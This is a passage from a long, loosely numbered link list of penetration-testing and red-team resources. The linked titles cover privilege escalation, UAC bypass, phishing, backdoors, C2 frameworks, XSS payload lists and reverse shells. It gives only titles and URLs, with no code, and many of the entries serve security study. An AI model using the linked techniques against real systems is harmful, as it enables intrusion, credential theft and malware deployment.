Transfer with Netcat for Windows: https://medium.com/p/a2ddc3557403 -78-Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html -79-Windows Privilege Escalation Guide: www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -80-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -81-Windows Exploitation Tricks: Abusing the User-Mode Debugger: https://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html -82-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -83- Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking -84-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -85-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -86-Comprehensive Guide to Sqlmap (Target Options): http://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2 -87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE: www.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple -88-Comprehensive Guide on Gobuster Tool: https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/ -89-My Top 5 Web Hacking Tools: https://medium.com/p/e15b3c1f21e8 -90-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -91-File System Access on Webserver using Sqlmap: http://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap -92-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -93-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd): http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa -95-XSS Payload List - Cross Site Scripting Vulnerability Payload List: https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html -96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection: https://www.notsosecure.com/analyzing-cve-2018-6376/ -97-Exploiting Sql Injection with Nmap and Sqlmap: http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap -98-awesome-malware-analysis: https://github.com/rshipp/awesome-malware-analysis -99-Anatomy of UAC Attacks: https://www.fuzzysecurity.com/tutorials/27.html -100-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -101-5 ways to Banner Grabbing: http://www.hackingarticles.in/5-ways-banner-grabbing -102-6 Ways to Hack PostgresSQL Login: http://www.hackingarticles.in/6-ways-to-hack-postgressql-login -103-6 Ways to Hack SSH Login Password: http://www.hackingarticles.in/6-ways-to-hack-ssh-login-password -104-10 Free Ways to Find Someone’s Email Address: https://medium.com/p/e6f37f5fe10a -105-USING A SCF FILE TO GATHER HASHES: https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes -106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit): http://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit 107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities: http://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities -108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs): https://medium.com/p/ef6542301c65 -109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information: https://gbhackers.com/external-black-box-penetration-testing -110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals: https://gbhackers.com/hacking-tools-list -111-Most Important Considerations with Malware Analysis Cheats And Tools list: https://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list -112-Awesome-Hacking: https://github.com/Hack-with-Github/Awesome-Hacking -113-awesome-threat-intelligence: https://github.com/hslatman/awesome-threat-intelligence -114-awesome-yara: https://github.com/InQuest/awesome-yara -115-Red-Team-Infrastructure-Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki -116-awesome-pentest: https://github.com/enaqx/awesome-pentest -117-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -118-pentest-wiki: https://github.com/nixawk/pentest-wiki -119-awesome-web-security: https://github.com/qazbnm456/awesome-web-security -120-Infosec_Reference: https://github.com/rmusser01/Infosec_Reference -121-awesome-iocs: https://github.com/sroberts/awesome-iocs -122-blackhat-arsenal-tools: https://github.com/toolswatch/blackhat-arsenal-tools -123-awesome-social-engineering: https://github.com/v2-dev/awesome-social-engineering -124-Penetration Testing Framework 0.59: www.vulnerabilityassessment.co.uk/Penetration%20Test.html -125-Penetration Testing Tools Cheat Sheet : https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ -126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool: https://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool -127-Spear Phishing 101: https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html -128-100 ways to discover (part 1): https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/ -129-Comprehensive Guide to SSH Tunnelling: http://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/ -130-Capture VNC Session of Remote PC using SetToolkit: http://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/ -131-Hack Remote PC using PSEXEC Injection in SET Toolkit: http://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/ -132-Denial of Service Attack on Network PC using SET Toolkit: http://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/ -133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit: http://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/ -134-Hack Any Android Phone with DroidJack (Beginner’s Guide): http://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/ -135-HTTP RAT Tutorial for Beginners: http://www.hackingarticles.in/http-rat-tutorial-beginners/ -136-5 ways to Create Permanent Backdoor in Remote PC: http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/ -137-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -138-EMPIRE TIPS AND TRICKS: https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/ -139-CSRF account takeover Explained Automated/Manual: https://medium.com/p/447e4b96485b -140-CSRF Exploitation using XSS: http://www.hackingarticles.in/csrf-exploitation-using-xss -141-Dumping Domain Password Hashes: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ -142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough: https://bneg.io/2017/05/24/empire-post-exploitation/ -143-Dropbox for the Empire: https://bneg.io/2017/05/13/dropbox-for-the-empire/ -144-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION: https://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/ -146-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ -148-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ -149-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ -151-enum4linux Cheat Sheet: https://highon.coffee/blog/enum4linux-cheat-sheet/ -152-enumeration: https://technologyredefine.blogspot.com/2017/11/enumeration.html -153-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -154-Command and Control – WMI: https://pentestlab.blog/2017/11/20/command-and-control-wmi -155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -156-Comprehensive Guide to Nmap Port Status: http://www.hackingarticles.in/comprehensive-guide-nmap-port-status -157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -158-Compromising Jenkins and extracting credentials: https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/ -159-footprinting: https://technologyredefine.blogspot.com/2017/09/footprinting_17.html -160-awesome-industrial-control-system-security: https://github.com/hslatman/awesome-industrial-control-system-security -161-xss-payload-list: https://github.com/ismailtasdelen/xss-payload-list -162-awesome-vehicle-security: https://github.com/jaredthecoder/awesome-vehicle-security -163-awesome-osint: https://github.com/jivoi/awesome-osint -164-awesome-python: https://github.com/vinta/awesome-python -165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit): https://www.exploit-db.com/download/44830.rb -166-nbtscan Cheat Sheet: https://highon.coffee/blog/nbtscan-cheat-sheet/ -167-neat-tricks-to-bypass-csrfprotection: www.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection -168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2: https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/ -169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts): https://medium.com/p/868a7bd7f692 -170-Nmap Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet/ -171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ -172-Phishing with PowerPoint: https://www.blackhillsinfosec.com/phishing-with-powerpoint/ -173-hide-payload-ms-office-document-properties: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/ -174-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -175-How to Build a C2 Infrastructure with Digital Ocean – Part 1: https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/ -176-WordPress Penetration Testing using Symposium Plugin SQL Injection: http://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection -177-Manual SQL Injection Exploitation Step by Step: http://www.hackingarticles.in/manual-sql-injection-exploitation-step-step -178-MSSQL Penetration Testing with Metasploit: http://www.hackingarticles.in/mssql-penetration-testing-metasploit -179-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file -180-MySQL Penetration Testing with Nmap: http://www.hackingarticles.in/mysql-penetration-testing-nmap -181-NetBIOS and SMB Penetration Testing on Windows: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows -182-Network Packet Forensic using Wireshark: http://www.hackingarticles.in/network-packet-forensic-using-wireshark -183-Escape and Evasion Egressing Restricted Networks: https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/ -183-Awesome-Hacking-Resources: https://github.com/vitalysim/Awesome-Hacking-Resources -184-Hidden directories and les as a source of sensitive information about web application: https://medium.com/p/84e5c534e5ad -185-Hiding Registry keys with PSRe ect: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 -186-awesome-cve-poc: https://github.com/qazbnm456/awesome-cve-poc -187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -188-Post Exploitation in Windows using dir Command: http://www.hackingarticles.in/post-exploitation-windows-using-dir-command 189-Web Application Firewall (WAF) Evasion Techniques #2: https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 -190-Forensics Investigation of Remote PC (Part 1): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1 -191-CloudFront Hijacking: https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/ -192-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato: http://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato -194-How to intercept TOR hidden service requests with Burp: https://medium.com/p/6214035963a0 -195-How to Make a Captive Portal of Death: https://medium.com/p/48e82a1d81a/share/twitter -196-How to find any CEO’s email address in minutes: https://medium.com/p/70dcb96e02b0 197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation: https://www.exploit-db.com/download/44630.txt -199-Microsoft Word upload to Stored XSS: https://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/ -200-MobileApp-Pentest-Cheatsheet: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet -201-awesome: https://github.com/sindresorhus/awesome -201-writing arm shellcode: https://azeria-labs.com/writing-arm-shellcode/ -202-debugging with gdb introduction: https://azeria-labs.com/debugging-with-gdb-introduction/ -203-emulate raspberrypi with qemu: https://azeria-labs.com/emulate-raspberry-pi-with-qemu/ -204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method: https://medium.com/p/a5807a9a8056 -205-A Red Teamer's guide to pivoting: https://artkond.com/2017/03/23/pivoting-guide/ -206-Using WebDAV features as a covert channel: https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/ -207-A View of Persistence: https://rastamouse.me/2018/03/a-view-of-persistence/ -208- pupy websocket transport: https://bitrot.sh/post/28-11-2017-pupy-websocket-transport/ -209-Subdomains Enumeration Cheat Sheet: https://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html -210-DNS Reconnaissance – DNSRecon: https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/ -211-Cheatsheets: https://bitrot.sh/cheatsheet -212-Understanding Guide to Nmap Firewall Scan (Part 2): http://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2 -213-Exploit Office 2016 using CVE-2018-0802: https://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html -214-windows-exploit-suggester: https://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html -215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS: https://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html -216-IDS, IPS AND FIREWALL EVASION USING NMAP: https://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html -217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet 218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals: https://gbhackers.com/web-application-security-tools-resources -219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet -220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing: https://gbhackers.com/top-500-important-xss-cheat-sheet -221-USBStealer – Password Hacking Tool For Windows Machine Applications: https://gbhackers.com/pasword-hacking -222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals: https://gbhackers.com/mobile-application-penetration-testing -223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now: https://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now -224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method: https://gbhackers.com/manual-sql-injection-2 -225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers: https://gbhackers.com/email-spoofing-exploiting-open-relay -226-Email Header Analysis – Received Email is Genuine or Spoofed: https://gbhackers.com/email-header-analysis -227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals: https://gbhackers.com/cyber-threat-intelligence-tools -228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool: https://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool -229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -230-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -231-A8-Cross-Site Request Forgery (CSRF): https://gbhackers.com/a8-cross-site-request-forgery-csrf -232-Fully undetectable backdooring PE File: https://haiderm.com/fully-undetectable-backdooring-pe-file/ -233-backdooring exe files: https://haiderm.com/tag/backdooring-exe-files/ -234-From PHP (s)HELL to Powershell Heaven: https://medium.com/p/da40ce840da8 -235-Forensic Investigation of Nmap Scan using Wireshark: http://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark -236-Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki -237-wifi-arsenal: https://github.com/0x90/wifi-arsenal -238-XXE_payloads: https://gist.github.com/staaldraad/01415b990939494879b4 -239-xss_payloads_2016: https://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016 -240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.: https://github.com/alebcay/awesome-shell -241-The goal of this repository is to document the most common techniques to bypass AppLocker.: https://github.com/api0cradle/UltimateAppLockerByPassList -242-A curated list of CTF frameworks, libraries, resources and softwares: https://github.com/apsdehal/awesome-ctf -243-A collection of android security related resources: https://github.com/ashishb/android-security-awesome -244-OSX and iOS related security tools: https://github.com/ashishb/osx-and-ios-security-awesome -245-regexp-security-cheatsheet: https://github.com/attackercan/regexp-security-cheatsheet -246-PowerView-2.0 tips and tricks: https://gist.github.com/HarmJ0y/3328d954607d71362e3c -247-A curated list of awesome awesomeness: https://github.com/bayandin/awesome-awesomeness -248-Android App Security Checklist: https://github.com/b-mueller/android_app_security_checklist -249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat: https://github.com/brannondorsey/wifi-cracking -250-My-Gray-Hacker-Resources: https://github.com/bt3gl/My-Gray-Hacker-Resources -251-A collection of tools developed by other researchers in the Computer Science area to process network traces: https://github.com/caesar0301/awesome-pcaptools -252-A curated list of awesome Hacking tutorials, tools and resources: https://github.com/carpedm20/awesome-hacking -253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.: https://github.com/cn0xroot/RFSec-ToolKit -254-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -255-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -256-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -257-A curated list of awesome forensic analysis tools and resources: https://github.com/cugu/awesome-forensics -258-Open-Redirect-Payloads: https://github.com/cujanovic/Open-Redirect-Payloads -259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook -260-Windows memory hacking library: https://github.com/DarthTon/Blackbone -261-A collective list of public JSON APIs for use in security.: https://github.com/deralexxx/security-apis -262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.: https://github.com/devsecops/awesome-devsecops -263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi: https://github.com/diasdavid/awesome-hacking-spots -264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups: https://github.com/djadmin/awesome-bug-bounty -265-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom: https://github.com/enddo/awesome-windows-exploitation -267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development: https://github.com/FabioBaroni/awesome-exploit-development -268-A curated list of awesome reversing resources: https://github.com/fdivrp/awesome-reversing -269-Git All the Payloads! A collection of web attack payloads: https://github.com/foospidy/payloads -270-GitHub Project Resource List: https://github.com/FuzzySecurity/Resource-List -271-Use your macOS terminal shell to do awesome things.: https://github.com/herrbischoff/awesome-macos-command-line -272-Defeating Windows User Account Control: https://github.com/hfiref0x/UACME -273-Free Security and Hacking eBooks: https://github.com/Hack-with-Github/Free-Security-eBooks -274-Universal Radio Hacker: investigate wireless protocols like a boss: https://github.com/jopohl/urh -275-A curated list of movies every hacker & cyberpunk must watch: https://github.com/k4m4/movies-for-hackers -276-Various public documents, whitepapers and articles about APT campaigns: https://github.com/kbandla/APTnotes -277-A database of common, interesting or useful commands, in one handy referable form: https://github.com/leostat/rtfm -278-A curated list of tools for incident response: https://github.com/meirwah/awesome-incident-response -279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys: https://github.com/meitar/awesome-lockpicking -280-A curated list of static analysis tools, linters and code quality checkers for various programming languages: https://github.com/mre/awesome-static-analysis -281-A Collection of Hacks in IoT Space so that we can address them (hopefully): https://github.com/nebgnahz/awesome-iot-hacks -281-A Course on Intermediate Level Linux Exploitation: https://github.com/nnamon/linux-exploitation-course -282-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -283-A curated list of awesome infosec courses and training resources.: https://github.com/onlurking/awesome-infosec -284-A curated list of resources for learning about application security: https://github.com/paragonie/awesome-appsec -285-an awesome list of honeypot resources: https://github.com/paralax/awesome-honeypots 286-GitHub Enterprise SQL Injection: https://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493 -287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis: https://github.com/secfigo/Awesome-Fuzzing -288-PHP htaccess injection cheat sheet: https://github.com/sektioneins/pcc/wiki -289-A curated list of the awesome resources about the Vulnerability Research: https://github.com/sergey-pronin/Awesome-Vulnerability-Research -290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF: https://github.com/swisskyrepo/PayloadsAllTheThings -291-A collection of Red Team focused tools, scripts, and notes: https://github.com/threatexpress/red-team-scripts -292-Awesome XSS stuff: https://github.com/UltimateHackers/AwesomeXSS -293-A collection of hacking / penetration testing resources to make you better!: https://github.com/vitalysim/Awesome-Hacking-Resources -294-Docker Cheat Sheet: https://github.com/wsargent/docker-cheat-sheet -295-Decrypted content of eqgrp-auction-file.tar.xz: https://github.com/x0rz/EQGRP -296-A bunch of links related to Linux kernel exploitation: https://github.com/xairy/linux-kernel-exploitation -297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -298-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -299-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: -301-Reading Your Way Around UAC (Part 1): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html -302--Reading Your Way Around UAC (Part 2): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html -303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2): https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/ -304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/p/29d034c27978 -304-Automating Cobalt Strike,Aggressor Collection Scripts: https://github.com/bluscreenofjeff/AggressorScripts https://github.com/harleyQu1nn/AggressorScripts -305-Vi Cheat Sheet: https://highon.coffee/blog/vi-cheat-sheet/ -306-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -307-LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/ -308-Systemd Cheat Sheet: https://highon.coffee/blog/systemd-cheat-sheet/ -309-Aircrack-ng Cheatsheet: https://securityonline.info/aircrack-ng-cheatsheet/ -310-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/?p=7212 -311-Wifi Pentesting Command Cheatsheet: https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/ -312-Android Testing Environment Cheatsheet (Part 1): https://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/ -313-cheatsheet: https://randomkeystrokes.com/category/cheatsheet/ -314-Reverse Shell Cheat Sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/ -315-Linux Commands Cheat Sheet: https://highon.coffee/blog/linux-commands-cheat-sheet/ -316-Linux Privilege Escalation using Sudo Rights: http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights -317-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -318-Linux Privilege Escalation by Exploiting Cronjobs: http://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ -319-Web Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -320-Webshell to Meterpreter: http://www.hackingarticles.in/webshell-to-meterpreter -321-WordPress Penetration Testing using WPScan & Metasploit: http://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit -322-XSS Exploitation in DVWA (Bypass All Security): http://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security -323-Linux Privilege Escalation Using PATH Variable: http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -324-VNC tunneling over SSH: http://www.hackingarticles.in/vnc-tunneling-ssh -325-VNC Pivoting through Meterpreter: http://www.hackingarticles.in/vnc-pivoting-meterpreter -326-Week of Evading Microsoft ATA - Announcement and Day 1: https://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html -327-Abusing DNSAdmins privilege for escalation in Active Directory: https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html -328-Using SQL Server for attacking a Forest Trust: https://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html -329-Empire : http://www.harmj0y.net/blog/category/empire/ -330-8 Deadly Commands You Should Never Run on Linux: https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/ -331-External C2 framework for Cobalt Strike: https://www.insomniacsecurity.com/2018/01/11/externalc2.html -332-How to use Public IP on Kali Linux: http://www.hackingarticles.in/use-public-ip-kali-linux -333-Bypass Admin access through guest Account in windows 10: http://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10 -334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports): http://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports -335-Bypass SSH Restriction by Port Relay: http://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay -336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key): http://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key -337-Bypass UAC in Windows 10 using bypass_comhijack Exploit: http://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit -338-Bind Payload using SFX archive with Trojanizer: http://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer -339-Capture NTLM Hashes using PDF (Bad-Pdf): http://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf -340-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/ -341-Detect SQL Injection Attack using Snort IDS: http://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/ -342-Beginner Guide to Website Footprinting: http://www.hackingarticles.in/beginner-guide-website-footprinting/ -343-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -344-Wifi Post Exploitation on Remote PC: http://www.hackingarticles.in/wifi-post-exploitation-remote-pc/ -335-Check Meltdown Vulnerability in CPU: http://www.hackingarticles.in/check-meltdown-vulnerability-cpu -336-XXE: https://phonexicum.github.io/infosec/xxe.html -337-[XSS] Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -338-Engagement Tools Tutorial in Burp suite: http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite -339-Wiping Out CSRF: https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f -340-First entry: Welcome and fileless UAC bypass: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ -341-Writing a Custom Shellcode Encoder: https://medium.com/p/31816e767611 -342-Security Harden CentOS 7 : https://highon.coffee/blog/security-harden-centos-7/ -343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS: https://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html -344-MySQL: https://websec.ca/kb/CHANGELOG.txt -345-Deobfuscation of VM based software protection: http://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf -346-Online Assembler and Disassembler: http://shell-storm.org/online/Online-Assembler-and-Disassembler/ -347-Shellcodes database for study cases: http://shell-storm.org/shellcode/ -348-Dynamic Binary Analysis and Obfuscated Codes: http://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf -349-How Triton may help to analyse obfuscated binaries: http://triton.quarkslab.com/files/misc82-triton.pdf -350-Triton: A Concolic Execution Framework: http://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf -351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM: https://github.com/JonathanSalwan/Tigress_protection -352-What kind of semantics information Triton can provide?: http://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/ -353-Code coverage using a dynamic symbolic execution: 